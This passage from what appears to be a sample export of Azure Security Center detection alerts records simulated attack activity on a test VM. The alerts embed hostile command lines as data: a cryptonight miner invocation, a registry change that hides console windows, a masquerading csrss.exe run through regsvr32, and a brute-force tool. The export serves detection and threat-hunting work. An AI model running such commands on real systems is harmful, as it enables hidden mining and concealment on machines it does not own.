""HostName"": ""msticalertswin1"",
""AzureID"": ""/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1"",
""OMSAgentID"": ""46fe7078-61bb-4bed-9430-7ac01d91c273"",
""Type"": ""host""
},
{
""$id"": ""3"",
""Name"": ""msticadmin"",
""NTDomain"": ""msticalertswin1"",
""Host"": {
""$ref"": ""2""
},
""IsDomainJoined"": false,
""Type"": ""account""
},
{
""$id"": ""4"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:10.7074046Z"",
""EndTimeUtc"": ""2019-01-15T17:15:10.7074046Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""2""
},
""Account"": {
""$ref"": ""3""
}
},
{
""$id"": ""5"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""suchost.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""CommandLine"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""ImageFile"": {
""$ref"": ""5""
},
""Account"": {
""$ref"": ""3""
},
""Host"": {
""$ref"": ""2""
},
""Type"": ""process""
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:17,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
175,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:13,2019-01-15 17:15:13,7e169933-4275-4b94-b37f-490417bcfc98,2518547282863799328_7e169933-4275-4b94-b37f-490417bcfc98,Detection,Microsoft,Suspicious system process executed,Suspicious system process executed,Suspicious system process executed,The system process c:\windows\fonts\csrss.exe was observed running in an abnormal context. Malware often use this process name to masquerade its malicious activity.,Medium,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\fonts\\csrss.exe"",
""command line"": ""c:\\windows\\fonts\\csrss.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0xcac"",
""account logon id"": ""0x1bd592e"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0x12bc"",
""System Process"": ""CSRSS.EXE"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\fonts"",
""Name"": ""csrss.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xcac"",
""CommandLine"": ""c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:13.6200671Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:13.6200671Z"",
""EndTimeUtc"": ""2019-01-15T17:15:13.6200671Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:19,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
176,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:13,2019-01-15 17:15:13,9895a5cc-6f49-45f5-a0eb-f05c1f11f264,2518547282865194453_9895a5cc-6f49-45f5-a0eb-f05c1f11f264,Detection,Microsoft,Suspicious WindowPosition registry value detected,Suspicious WindowPosition registry value detected,Suspicious WindowPosition registry value detected,"Analysis of host data on MSTICALERTSWIN1 detected an attempted WindowPosition registry configuration change that could be indicative of hiding application windows in non-visible sections of the desktop. This could be legitimate activity, or an indication of a compromised machine: this type of activity has been previously associated with known adware (or unwanted software) such as Win32/OneSystemCare and Win32/SystemHealer and malware such as Win32/Creprote. When the WindowPosition value is set to 201329664, (Hex: 0x0c00 0c00, corresponding to X-axis=0c00 and the Y-axis=0c00) this places the console app's window in a non-visible section of the user's screen in an area that is hidden from view below the visible start menu/taskbar. Known suspect Hex value includes, but not limited to c000c000",Low,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\reg.exe"",
""Suspicious Command Line"": "".\\reg.exe add \""hkcu\\console\"" /v windowposition /t reg_dword /d 33554556 /f"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x2f8"",
""Hex Value set for WindowPosition"": ""200007c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""reg.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x2f8"",
""CommandLine"": "".\\reg.exe add \""hkcu\\console\"" /v windowposition /t reg_dword /d 33554556 /f"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:13.4805546Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""Hive"": ""HKEY_CURRENT_USER"",
""Key"": ""console"",
""Type"": ""registry-key""
},
{
""$id"": ""11"",
""Key"": {
""$ref"": ""10""
},
""ValueType"": ""Unknown"",
""Type"": ""registry-value""
},
{
""$id"": ""12"",
""Key"": {
""$ref"": ""10""
},
""Name"": ""windowposition"",
""Value"": ""System.Byte[]"",
""ValueType"": ""DWord"",
""Type"": ""registry-value""
},
{
""$id"": ""13"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:13.4805546Z"",
""EndTimeUtc"": ""2019-01-15T17:15:13.4805546Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:19,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
177,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:13,2019-01-15 17:15:13,84ea8dcd-9436-4b4d-82b2-36114028bd61,2518547282863799328_84ea8dcd-9436-4b4d-82b2-36114028bd61,Detection,Microsoft,Executable found running from a suspicious location,Executable found running from a suspicious location,Executable found running from a suspicious location,"Analysis of host data detected an executable file on MSTICALERTSWIN1 that is running from a location in common with known suspicious files. This executable could either be legitimate activity, or an indication of a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\windows\\fonts\\csrss.exe"",
""Suspicious Command Line"": ""c:\\windows\\fonts\\csrss.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xcac"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\fonts"",
""Name"": ""csrss.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xcac"",
""CommandLine"": ""c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:13.6200671Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:13.6200671Z"",
""EndTimeUtc"": ""2019-01-15T17:15:13.6200671Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:19,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
178,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:14,2019-01-15 17:15:14,58851b10-8f5c-48f1-aade-b1529f4e2c7f,2518547282858353938_58851b10-8f5c-48f1-aade-b1529f4e2c7f,Detection,Microsoft,Executable found running from a suspicious location,Executable found running from a suspicious location,Executable found running from a suspicious location,"Analysis of host data detected an executable file on MSTICALERTSWIN1 that is running from a location in common with known suspicious files. This executable could either be legitimate activity, or an indication of a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\regsvr32.exe"",
""Suspicious Command Line"": "".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x14f0"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""regsvr32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x14f0"",
""CommandLine"": "".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:14.1646061Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:14.1646061Z"",
""EndTimeUtc"": ""2019-01-15T17:15:14.1646061Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:19,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
179,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:14,2019-01-15 17:15:14,7f983018-fd59-4e9e-ba70-295f6beb0e9c,2518547282850984831_7f983018-fd59-4e9e-ba70-295f6beb0e9c,Detection,Microsoft,Detected anomalous mix of upper and lower case characters in command-line,Detected anomalous mix of upper and lower case characters in command-line,Detected anomalous mix of upper and lower case characters in command-line,"Analysis of host data on MSTICALERTSWIN1 detected a command-line with anomalous mix of upper and lower case characters. This kind of pattern, while possibly benign, is also typical of attackers trying to hide from case-sensitive or hash-based rule matching when performing administrative tasks on a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\rundll32.exe"",
""Suspicious Command Line"": "".\\rundll32 /c shell32control_randll.dll"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x172c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""rundll32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x172c"",
""CommandLine"": "".\\rundll32 /c shell32control_randll.dll"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:14.9015168Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:14.9015168Z"",
""EndTimeUtc"": ""2019-01-15T17:15:14.9015168Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:19,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
180,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:15,2019-01-15 17:15:15,c7318da8-368f-47f8-bff5-e15600a3fb80,2518547282845656644_c7318da8-368f-47f8-bff5-e15600a3fb80,Detection,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,Machine logs indicate that the suspicious process: 'c:\diagnostics\usertmp\dubrute.exe' was running on the machine; this process is associated with carrying out brute force attacks. An attacker may have compromised this host as a launchpad for carrying out further attacks.',High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\dubrute.exe"",
""Suspicious Command Line"": "".\\dubrute.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1bbc"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""dubrute.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1bbc"",
""CommandLine"": "".\\dubrute.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:15.4343355Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:15.4343355Z"",
""EndTimeUtc"": ""2019-01-15T17:15:15.4343355Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:19,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
181,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:18,2019-01-15 17:15:18,a7e8e8c1-4561-48ea-bf75-a22c7bfc2257,2518547282813841329_a7e8e8c1-4561-48ea-bf75-a22c7bfc2257,Detection,Microsoft,Rare SVCHOST service group executed,Rare SVCHOST service group executed,Rare SVCHOST service group executed,The system process SVCHOST was observed running a rare service group. Malware often use SVCHOST to masquerade its malicious activity.,Informational,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\system32\\svchost.exe"",
""command line"": ""c:\\windows\\system32\\svchost.exe -k malicious"",
""parent process"": ""cmd.exe"",
""process id"": ""0x1920"",
""account logon id"": ""0x1bd592e"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0x12bc"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious SVCHost\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-SVCHost.pdf?sv=2018-03-28&sr=b&sig=igCs0cA7B2rarN4kGRqCl473qJZoP8z6s8skpsDaBS0%3D&spr=https&st=2019-01-15T11:43:53Z&se=2019-04-15T11:58:53Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=a59677a1-917d-436c-8ede-6cc8220c9a45\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1920"",
""CommandLine"": ""c:\\windows\\system32\\svchost.exe -k malicious"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:18.615867Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:18.615867Z"",
""EndTimeUtc"": ""2019-01-15T17:15:18.615867Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:23,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
182,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:18,2019-01-15 17:15:18,12ae1e22-347e-454c-ae0d-ebb48cdf189b,2518547282812706885_12ae1e22-347e-454c-ae0d-ebb48cdf189b,Detection,Microsoft,Azure Security Center test alert (not a threat),Azure Security Center test alert (not a threat),Azure Security Center test alert (not a threat),This is a test alert generated by Azure Security Center. No further action is needed.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\asc_alerttest_662jfi039n.exe"",
""Suspicious Command Line"": ""asc_alerttest_662jfi039n.exe -foo"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1a6c"",
""Arguments Auditing Enabled"": ""true"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""asc_alerttest_662jfi039n.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1a6c"",
""CommandLine"": ""asc_alerttest_662jfi039n.exe -foo"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:18.7293114Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:18.7293114Z"",
""EndTimeUtc"": ""2019-01-15T17:15:18.7293114Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:23,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
183,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:19,2019-01-15 17:15:19,c76cdb6c-cea0-4b2b-9ab6-1442a5857ed8,2518547282803821916_c76cdb6c-cea0-4b2b-9ab6-1442a5857ed8,Detection,Microsoft,Detected Petya ransomware indicators,Detected Petya ransomware indicators,Detected Petya ransomware indicators,Analysis of host data on MSTICALERTSWIN1 detected indicators associated with Petya ransomware. See https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/ for more information. Review the commandline associated in this alert and escalate this alert to your security team.,High,False,"{
